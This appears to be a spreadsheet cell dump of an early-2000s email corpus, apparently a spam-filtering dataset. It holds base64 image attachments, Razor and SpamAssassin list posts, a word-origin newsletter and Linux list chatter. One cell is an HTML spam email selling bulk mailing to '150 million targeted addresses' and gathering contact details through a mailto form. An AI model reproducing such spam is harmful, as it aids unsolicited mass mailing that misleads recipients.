 J9YMDYWKyDrhXmkPaX1GgRs0ETmWFoODaLYW2QBfVCmXJqApaDV8T6Av0iG4fnKWppbB0HEJJxbA
 vzH6erO+f1nsT6gQBJFHyS30gDFFj+VJpTH4WYpU6Q7Bz2h+qKRrn8/SZbCgaVdd4lIjAtreQbPW
 FyWvyPUQ8v8AZ+pcnP1TNwKhleWViDVI+UQQjuq+5BiQAAKPO34gCKcofFJdCF2GnrVy0SCWqrOI
 gOAot4d4t/C1W3FYY3axOiFW4UovoOeEZQUqt6SCrz9EJHGEARXRbuvtcbSdF1OC7spKYbrs6IQ9
 t3i6n0QxAQCNH6MmEP8A8UooeRWWA7ZH5gZYciN+Y+E3WtVRvyOl9pnrYi9iqv8AlA8Vldow50e0
 sDRa1X75YevP/bR6XAyDNmc9rosP4ufPqDa7/fPKFXdP9G/4/wD/2gAIAQIDAT8QCWPQqXi5T/CN
 hM8Mc0jSo4iBpJSjzSp8GqULTLiFJSk3Y4rPNhgRH5hXY+YrAEaZLebmv06k1QcAoTZ75gOp9UoC
 2tzSUAQ1WkJw+8NJ7R9Mef3KwDoiDyWYzU1+nUihtpqQBD2li+Dt/rSK7yoGsMRb3lNIFf8AZWRp
 C9mwVdaKq4MGk1+nU6ALv45lyKm5Cp6ELgJRbm2Nnk2YqL1m4FxwMVoeNOJcG+t9j57DsxFLmv06
 nQcx/sF/cUXb939yyG0G/JlD5w0P7xDlrM1sCHnNfp1Ohf8AAC2WItqzggocyesFMKQuCGJeQgBq
 Paa7TX6dTpCUuGxGg9kzFwIm6V6qy9jzcc1g8HoKNy0BdIVuRXpKXjqRUzyS8tLS8tLlR6nQjmVK
 lSur1Oty5fhep1qVKlSpXR8I6X1qVKiSuh1qOJfS5bLS/AdERf4iP8f/2gAIAQMDAT8QWKjorASk
 s/g0QmFGITh6AAlzIxFEJWeDTFipaRbhLVsHQNLvHw0i1lsOZo6s0zMifaUs7+GIKCmKFgDSArKi
 tRsJpF/uWGu5dYmjqzTNPsx2FeUUciVUvmD5ekqY0TflkPf9RtGy92qvLvLVoGODymjqzTAZd4wN
 Fo+UQCnp+o20UIapYvXU/wCREUJBdh51f5tMrlWTSgtnm4XEUl4veqzh9/UiruXNHVmmMxd7+IKp
 EYp69dvmG1TvgWXlnXTaIDJagyTmzjuU1tMbpDByK9WR1O5vmWaaKd7oJKC8po6s0RWTOfWXDVBG
 TUyTUJ06WU5cteZmTm3unV6w/wBuBzAnczjHM0dWaJmF76TXBH49IQ0mJGhDs8+kUmYrGesUVN43
 gLBZ0UlZSVlei4dXosBEwZcuUgw6vQX4NSVlQh1eiohLJ4ANYdXpky3SEqVMdA9XpUeiulSiUldU
 j1BX8TD+P//Z
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="spacer(1).gif"
 Content-Transfer-Encoding: base64
 Content-Description: spacer(1).gif
 Content-Id: &lt;151027-2200211212236465515077@designer&gt;
 R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_right.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_right.gif
 Content-Id: &lt;1315928-2200211212236465515078@designer&gt;
 R0lGODlhBQABAKIAAJ+cnMvIyeHg3/Dw8LKvrwAAAAAAAAAAACH5BAAAAAAALAAAAAAFAAEAAAME
 CBQyCQA7
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_top_right.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_top_right.gif
 Content-Id: &lt;2481129-2200211212236465515079@designer&gt;
 R0lGODlhBQAGALMAAM7MzKShocrIx66rq7Wysvv7+tTR0eno6PDw8Pb19dza2b27u/n5+ebl5fPy
 8f///yH5BAAAAAAALAAAAAAFAAYAAAQU0CVWXjuIGtXyEsqRDIvROAEBnBEAOw==
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_bottom.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_bottom.gif
 Content-Id: &lt;2943330-2200211212236465515080@designer&gt;
 R0lGODlhAQAGAKIAAJ+cnMvIyeHg3/Dw8LKvr5WSkgAAAAAAACH5BAAAAAAALAAAAAABAAYAAAME
 WEAhkwA7
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_left_corner.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_left_corner.gif
 Content-Id: &lt;3045031-2200211212236465515081@designer&gt;
 R0lGODlhBgAGAMQAAJqXlpWSkrKvr8rIx/b19a6rq5+cnMvIyfv7+uHg3727u87MzPn5+dTR0aSh
 oeno6LWysuLh4PPy8dza2fDw8Obl5QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAA
 AAAALAAAAAAGAAYAAAUeYLRADhBUjVI4xjMNCiRQ1dQsB0M9VZQgDIJEQgkBADs=
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_right_corner.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_right_corner.gif
 Content-Id: &lt;2426932-2200211212236465515082@designer&gt;
 R0lGODlhBQAGAMQAAJqXlr27u9TR0aShocrIx/v7+uno6PDw8Pb19ebl5bWysuLh4Nza2c7MzPn5
 +fPy8f///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAA
 AAAALAAAAAAFAAYAAAUYIKA0yzMEQvIoBGMgDZMczmLQxYM4BRQCADs=
 ------=_NextPart_94915C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] What's wrong with the Razor servers now?
</t>
  </si>
  <si>
    <t xml:space="preserve">I noticed a low count of razor'd spam messages. So after digging, if I
 razor-report a message the diags say that it was accepted but if I turn
 around and run a check on the exact same message that was reported, then
 it doesn't find the sig and as such isn't spam.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Urban Boquist wrote:
 &gt; it seems to hang. Memory usage goes up to 73MB and stays there. I have
 &gt; let it run for an hour before I killed it. This was on a
 &gt; Pentium-II-366. Yes, I know, a bit slow, but still...
 &gt; 
 &gt; Can anyone else confirm this hang? Maybe I should just upgrade...
 &gt; 
 &gt; My environment is: SA-2.31, perl-5.6 running on NetBSD-1.6F.
 Version 2.40-cvs (from today) on NetBSD/i386 1.5.2 (Athlon 1500):
   Aug 29 17:55:53 silence spamd[2052]: processing message
   &lt;20020829093613.6A00319300@groda.boquist.net&gt; for kh:1234, expecting
   1744014 bytes. 
   Aug 29 17:57:10 silence spamd[2052]: clean message (2.5/5.0) for
   kh:1234 in  77 seconds, 1744014 bytes. 
 Resident size about 75MB, according to top.
 ciao
      Klaus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</si>
  <si>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Qualified Potential Clients For Your Industry
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Online Marketing Strategies&lt;/TITLE&gt;&lt;META http-equiv=3DContent=
 -Type content=3D"text/html; 
 charset=3Dwindows-1252"&gt;&lt;META content=3D"MSHTML 5.50.4134.100" name=3DGENE=
 RATOR&gt;&lt;META content=3DFrontPage.Editor.Document name=3DProgId&gt;
     &lt;/HEAD&gt;&lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMarg=
 in=3D0&gt;
      &lt;DIV align=3Dcenter&gt;&lt;CENTER&gt;&lt;TABLE height=3D0 cellSpacing=3D0 cellPad=
 ding=3D0 width=3D500 border=3D0&gt;
 	&lt;TBODY&gt;&lt;TR&gt;&lt;TD width=3D"100%" height=3D200&gt;&lt;P align=3Dcenter&gt;
 	&lt;FONT face=3D"Georgia, Times New Roman" size=3D7&gt;
 	&lt;B&gt;&lt;FONT color=3D#08296b&gt;Need More Clients?&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P align=
 =3Dcenter&gt;
 	&lt;FONT face=3D"Times New Roman" size=3D5&gt;&lt;B&gt;&lt;FONT color=3D#ff0000&gt;
 	Increase Your Sales 15%-40% Every Month!&lt;/FONT&gt;&lt;/B&gt;
 &lt;HR&gt;
 &lt;FONT color=3D#ff0000&gt;&lt;B&gt;&lt;FONT face=3D"Times, New Roman" color=3D#08296b s=
 ize=3D3&gt;
 Targeted E-mail Marketing Is A Proven Method For Return Sales&lt;br&gt;
 &lt;/FONT&gt;&lt;/B&gt;
 &lt;FONT color=3D#000000 size=3D3&gt;
   With a database of over 150 million "targeted" addresses, we can reach y=
 our potential clients
   anywhere in the world.  Our staff creates interactive ad campaigns, spec=
 ifically targeted to 
   your client base, and designed to produce staggering responses for your =
 business.  A steady 
   lead source can make sure your sales team will consistently close deals.
 &lt;/FONT&gt;
 &lt;P&gt;
    &lt;FONT face=3D"Times, New Roman" size=3D3&gt;&lt;B&gt;&lt;FONT color=3D#08296b&gt;The G=
 reatest 
       Return On Your Marketing Dollar&lt;/FONT&gt;&lt;/B&gt;
 &lt;FONT color=3D#000000&gt;&lt;BR&gt;&lt;FONT size=3D3&gt;Targeted e-mail marketing is the =
 most effective way to reach
 global and local markets with a small expense compared to that of conventi=
 onal marketing.  
 Quality work and a dedicated professional staff will ensure your ad campai=
 gn to be successful.  
 Put our educated team of marketers to work for you.&lt;br&gt;&lt;br&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/p&gt;=
 &lt;/tr&gt;&lt;/td&gt;&lt;/tbody&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#08296b size=3D4&gt;Fill out the form be=
 low to speak
 with one &lt;br&gt;of our marketing specialists.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE=
 &gt;
 &lt;P&gt;&lt;FONT color=3D#08296b size=3D2&gt;Required Input Field&lt;FONT color=3D#ff000=
 0
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks1811@firemail.de?subject=3DE-marketing_=
 Inquiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#ff0000
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Type of 
             Business&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DTYPE_OF_BUSINESS&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D500&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT face=3D"Times, New Roman" color=3D#08296b
       size=3D1&gt;To be removed, please  
       &lt;A href=3D"mailto:d_lete106@lycos.co.uk?subject=3DRemove_E-marketing=
 "&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Bug 704] spamd doesn't remove pid file on shutdown when running as non-root user
</t>
  </si>
  <si>
    <t xml:space="preserve">bugzilla-daemon@hughes-family.org wrote:
 &gt; http://www.hughes-family.org/bugzilla/show_bug.cgi?id=704
 &gt; ok, this is now fixed. cheers!
 How did you fix it? By creating the pidfile as the "-u" user?
 If so, you should add this to the documentation since it prevents
 the use of the standard /var/run directory (which is only writable
 by root).
 +Thomas
 -- 
 Thomas Anders &lt;anders@hmi.de&gt;
 Hahn-Meitner-Institut Berlin, Germany
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: World Wide Words -- 20 Jul 02
</t>
  </si>
  <si>
    <t xml:space="preserve">WORLD WIDE WORDS           ISSUE 296          Saturday 20 July 2002
 -------------------------------------------------------------------
 Sent each Saturday to 15,000+ subscribers in at least 119 countries
 Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
 &lt;http://www.worldwidewords.org&gt;      &lt;TheEditor@worldwidewords.org&gt;
 -------------------------------------------------------------------
  IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
    ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
 Contents
 -------------------------------------------------------------------
 1. Turns of Phrase: Beanpole family.
 2. Weird Words: Jobbernowl.
 3. Beyond Words.
 4. Q&amp;A: Chip off the old block; Bells and whistles; Mortarboard.
 5. Endnote.
 6. Subscription commands.
 7. Contact addresses.
 1. Turns of Phrase: Beanpole family
 -------------------------------------------------------------------
 Historically, families have usually had more children than parents,
 resulting in family trees that looked like pyramids. However, in
 recent years, especially in countries like Britain and the US, the
 number of children per generation has steadily gone down, while
 life span has increased. This has led to a shape of family tree
 that some researchers have likened to a beanpole - tall and thin,
 with few people in each generation. The term "beanpole family" has
 been around in the academic literature at least since 1987, but it
 rarely appears elsewhere. A recent British report has brought it to
 wider public notice, at least in the UK. Some researchers find it
 too slangy and prefer the jargon term "verticalised" to describe
 such families. Whatever term you prefer, specialists are sure that
 the demographic shift is having a big effect on personal
 relationships within the family and (for example) the role of
 grandparents.
 The rising divorce rate partly explains the growth of the
 'beanpole' family. With almost one in two marriages ending in
 divorce, many adults have at least two families, each with a single
 child.
                                              ["Observer", May 2002]
 Noting the rising number of so-called 'beanpole' families in
 Britain (families with only one child), the report warns that a
 child without siblings 'is starved of the companionship of family
 members of their own age ... [leading to] greater social isolation,
 with teenagers adopting a more selfish attitude to life'.
                                             ["Guardian", June 2002]
 2. Weird Words: Jobbernowl
 -------------------------------------------------------------------
 A stupid person, a blockhead.
 Unfortunately, this useful and effective insult has rather dropped
 out of use in these mealy-mouthed times. The last excursion for it
 that I can find is in the classic W C Fields film "The Bank Dick"
 of 1940, in which the word occurs in a variant form in the line:
 "Surely, don't be a luddie-duddie, don't be a moon-calf, don't be a
 jabbernow, you're not those, are you?". Before that, it turns up in
 one of the novels of Hall Caine in 1890, but even by then it seems
 to have been rather rare.
 It's from the old French "jobard", from "jobe", silly. That word
 was then added to "noll", the top or crown of the head, the noddle.
 The first sense was of a block-like or stupid-looking head, but was
 soon extended to refer to the quality of the mind within.
 "Jobbernowlism" is the condition or state of being a "jobbernowl",
 or an act or remark that is especially stupid.
 Careful how you use it: the recipient might be a subscriber!
 3. Beyond Words
 -------------------------------------------------------------------
 I've been away at a heritage conference in Colchester these past
 few days. On my way back, my eye was caught by this warning sign
 posted above some steps at the local railway station:
    Caution
    Do not run on the stairs
    Use the hand rail
 4. Q&amp;A
 -------------------------------------------------------------------
 Q. For my job I have to read American magazines concerning consumer
 electronics, home systems, burglar alarms, etc. I very often come
 across the expression "bells and whistles", which seem to relate to
 equipment, accessories or features that are offered to the customer
 as plusses but are not really indispensable for the device to work.
 Is that right? And where does that funny phrase come from? [Herve
 Castelain, France]
 Q. You're right about the meaning of this phrase, which refers to
 gimmicks - non-essential but often engaging features added to a
 piece of technical equipment or a computer program to make it seem
 more superficially attractive without enhancing its main function.
 The phrase is actually quite modern and may be a product of the
 American military. At least, one of its earliest appearances was in
 an article in "Atlantic" in October 1982, which said it was
 "Pentagon slang for extravagant frills". There's some evidence that
 the term has actually been around since the 1960s, but the early
 evidence is sparse.
 Where it comes from is still a matter of learned debate. A literal
 sense of the phrase appeared around the middle of the nineteenth
 century, referring to streetcars, railways and steamships. Before
 modern electronics, there were really only two ways to make a loud
 warning noise - you either rang a bell or tooted a whistle. Steam
 made the latter a real power in the land (anybody who has heard the
 noisy out-of-tune calliope on the steamboat Natchez at New Orleans
 will agree about its power, though less so about its glory). And at
 one time "clang, clang, clang went the trolley" in large numbers of
 American cities.
 At least some early US railroad locomotives had both bells and
 whistles, as this extract from an article in "Appleton's Journal"
 of 1876 shows:
   You look up at an angle of sixty degrees and see sweeping
   along the edge of a precipice, two-thirds up the rocky
   height, a train of red-and-yellow railway-cars, drawn by
   two wood-burning engines, the sound of whose bells and
   whistles seems like the small diversions of very little
   children, so diminished are they by the distance.
 Could it be that to have both bells and whistles was thought
 excessive, a case of belt and braces, an unnecessary feature, a
 frill?
 Possibly. But it's more probable the slang sense of the term comes
 from that close musical relative of the calliope, the theatre
 organ. Extraordinary instruments such as the Mighty Wurlitzer
 augmented their basic repertoire by all sorts of sound effects to
 help the organist accompany silent films, among them car horns,
 sirens, and bird whistles. These effects were called toys, and
 organs often had "toy counters" with 20 or more noisemakers on
 them, including various bells and whistles. In the 1950s, decades
 after the talkies came in, but while theatre organs were still
 common in big movie houses, these fun features must have been
 considered no longer essential to the function of the organ but
 mere fripperies, inessential add-ons.
 It's possible the slang sense grew out of that. It got taken up
 especially by the computing industry, perhaps because opportunities
 to add them are so great.
                         -----------
 Q. The designation of "robes" for academic dress clearly comes from
 its origin with the clergy in the Middle Ages. But what about
 "mortarboards"? The best I could find was its origin in the 12th or
 13th century clergy cap, but that was not square-shaped. Does
 "mortarboard" refer to the guilds or is its origin more ancient?
 A. The academic cap often called a "mortarboard" is quite ancient,
 but that word for it only dates from the middle of the nineteenth
 century (a less slangy way to identify it is to call it a
 "square"). The literal mortar board is the wooden plate, usually
 with a handle underneath, on which bricklayers carry small amounts
 of mortar. A similar tool is used by plasterers, but they usually
 call it a hawk.
 What seems to have happened is that the similarity in shape between
 the brickie's board and the academic cap led some wag, probably at
 Oxford University, to apply the name of the one to the other. Our
 first recorded use is in a book of 1853-6, "The Adventures of Mr.
 Verdant Green, an Oxford Freshman" by a clergyman named Edward
 Bradley, who wrote under the pen name of Cuthbert Bede (the names
 of the two patron saints of Durham, where he went to school).
 Verdant Green is a sort of undergraduate Pickwick and the book
 recounts his adventures. This magisterial reprimand by a don
 appears after one such escapade: "I will overlook your offence in
 assuming that portion of the academical attire, to which you gave
 the offensive epithet of 'mortar-board'; more especially, as you
 acted at the suggestion and bidding of those who ought to have
 known better".
 After a slow start, the book became a huge success, selling more
 than 200,000 copies in the next 20 years. Whether Mr Bradley
 invented the slang term we may never know, but his book certainly
 popularised it.
                         -----------
 Q. I got into a discussion about "chip off the old block" with
 friends, and we are wondering if it had to do with sculpting,
 jewelry making, woodworking, or none of the above. What does this
 term mean, and where did it come from? [Vijay Renganathan]
 A. The associations are with carpentry, and the block is definitely
 made of wood.
 The first form of the expression was "chip of the same block",
 meaning that a person or thing was made of the same stuff as
 somebody or something else, so from the same source or parentage.
 An early example is in a sermon by Dr Robert Sanderson (at one time
 Bishop of Lincoln), dated 1637: "Am not I a child of the same Adam
 ... a chip of the same block, with him?".
 Later that century, another form is recorded "a chip of the old
 block", which meant that somebody was the spitting image of his
 father, or continued some family characteristic. At some point,
 probably late in the nineteenth century, this was modified to "a
 chip off the old block", which does nothing to change the sense,
 but is the way it's now usually written or said.
 5. Endnote
 -------------------------------------------------------------------
 "The sum of human wisdom is not contained in any one language, and
 no single language is capable of expressing all forms and degrees
 of human comprehension." [Ezra Pound, quoted by David Crystal in
 the "Guardian", 25 October 1999]
 6. Subscription commands
 -------------------------------------------------------------------
 To leave the list, change your subscription address, or subscribe,
 please visit &lt;http://www.worldwidewords.org/wordlist.htm&gt;.
 Or, you can send a message to &lt;listserv@listserv.linguistlist.org&gt;
 from the address at which you are (or want to be) subscribed:
   To leave, send: SIGNOFF WORLDWIDEWORDS
   To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
 7. Contact addresses
 -------------------------------------------------------------------
 Do not use the address that comes up when you hit 'Reply' on this
 mailing, or your message will be sent to an electronic dead-letter
 office. Either create a new message, or change the outgoing 'To:'
 address to one of these:
   For general comments: &lt;TheEditor@worldwidewords.org&gt;.
   For Q&amp;A section questions: &lt;QandA@worldwidewords.org&gt;.
 -------------------------------------------------------------------
 World Wide Words is copyright (c) Michael Quinion 2002.  All rights
 reserved. The Words Web site is at &lt;http://www.worldwidewords.org&gt;.
 -------------------------------------------------------------------
 You may reproduce this newsletter in whole or in part in other free
 media online provided that you include this note and the copyright
 notice above. Reproduction in print media or on Web pages requires
 prior permission: contact &lt;TheEditor@worldwidewords.org&gt;.
 -------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; CURVE: 5486124068793688683255936251187209270074392635932332070112001988456197381759672947165175699536362793613284725337872111744958183862744647903224103718245568925556758419805069056847065147709058947190200192542277555125346128173135573355537502225974504428432790108988791795746287271944131683364548299056172016
 HA!  Ha ha ha! ha, ha ha, a-hee, hee. aHEM! 
 whew. (sigh)
 Good one. ok, Robert, you win :)
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">advice to the lovelorn haiku
 serendipity
 pilots synchronicity:
 turn the next corner.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 18, 2002 7:13 PM
 To: R. A. Hettinga
 Cc: fork@spamassassin.taint.org
 Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
 On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 And, as always, you can take a page out of Fight Club and start showing up
 at all sorts of support groups. Look what it did for Marla and Jack...
 "JACK You can't have *both* parasites. You take blood parasites and --
 MARLA I want brain parasites.
 She opens another dryer and does the same thing again. PG 19
 JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 and --
 MARLA I want that.
 JACK You can't have the whole brain!
 MARLA So far, you have four and I have two!
 JACK Well, then, take blood  parasites. Now, we each have three.
 MARLA So, we each have three -- that's six. What  about the seventh day? I
 want ascending bowel cancer.
 JACK *I* want ascending bowel cancer.
 MARLA That's your favorite, too? Tried to slip it by me, huh?
 JACK We'll split it. You get it the first and third Sunday of the month.
 MARLA Deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] honor is not in csl
</t>
  </si>
  <si>
    <t xml:space="preserve">I know that I did this during the week that all the catalogue's were
 hokey but after that I changed it back to discovery.  So I can see why
 people are using honor.
 -----Original Message-----
 From: Vipul Ved Prakash [mailto:mail@vipul.net] 
 Sent: Thursday, August 22, 2002 5:55 PM
 To: razor-users@example.sourceforge.net
 Subject: [Razor-users] honor is not in csl
 Folks, 
 Some of you seem to have hardcoded honor as the default catalogue
 server. There are three catalogue only servers running now, and honor is
 acting as a nomination only server. Tonight we will be completely
 turning off catalogue support on honor, so if you are specifying honor
 with the -rs option, please take it out and let the agents discover a
 closeby catalogue server.
 cheers,
 vipul.
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r_______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Startups, Bubbles, and Unemployment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Ultimately, there was a big
 &gt; disagreement about how to sell the product (sales guys wanted to sell
 &gt; the thing for a gazillion dollars to megaclients, but we thought it
 &gt; would make more sense to get more people using it so we could get more
 &gt; feedback from many different places).  The bottom line was that the
 &gt; route we wound up going (megaclients for megabucks) had a megalong
 &gt; sales cycle.  The sales force staffed up and tried to sell the
 &gt; earliest releases of the software -- even succeeding in a few
 &gt; significant cases -- but couldn't get enough to cover their own
 &gt; expenses, much less the actual development of the product.
 Now where have I seen that before.... oh yeah... its happening to me right
 now...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Architecture crossover trouble w RH7.2 (solved)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 26, 2002 at 03:56:22PM +0100 or so it is rumoured hereabouts, 
 Wynne, Conor thought:
 &gt; Surely it would be faster to save you conf files, install it on the box
 &gt; again, copy back you confs and voila.
 &gt; All you car about are the confs as the boite has no DATA right?
 Yeah, but then I'd have to remember _exactly_ which confs I'd modified and
 they're not all in /etc either...
 &gt; Thats what I would do, but you sysadmins have to make life as difficult &amp;
 &gt; complicated as possible ;--)
 Yup...  In this case, I had two issues.  1. I mirrored the disk to give to
 someone else to work on but the box he has available has only a P1 or P2
 processor.  2. My celeron box has been crashing the backup software so I
 wanted to try out the backup in a different box to make sure it's hardware
 related.  Again, it's also an interesting exercise...
 &gt; Have you thought about mirroring the system drives? Might save you serious
 &gt; hassle down the line. 
 Oh, I'm doing that too.  This is going to Africa so I'm aiming for as
 robust as possible with belt, braces and probably an all-in-one jumpsuit!
 I'll be mirroring the disk but that is worth only so much (eg. lightning
 strike taking out the disk(s) or system compromise)  I'm also going for a
 backup to CDR with an automated restore http://www.mondorescue.org .  The
 admin out there wouldn't be able to build the system again if the mobo got
 fried and the replacement was the wrong arch but an i386 compatible
 install will mean just dropping in the HD and booting (ish)...
 Conor
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   2:32pm  up 64 days, 23:49,  0 users,  load average: 0.00, 0.00, 0.00
 Hobbiton.cod.ie
   2:19pm  up 7 days, 20:56,  1 user,  load average: 0.05, 0.02, 0.00
 -- 
 Irish Linux Users' Group: ilug@linux.ie
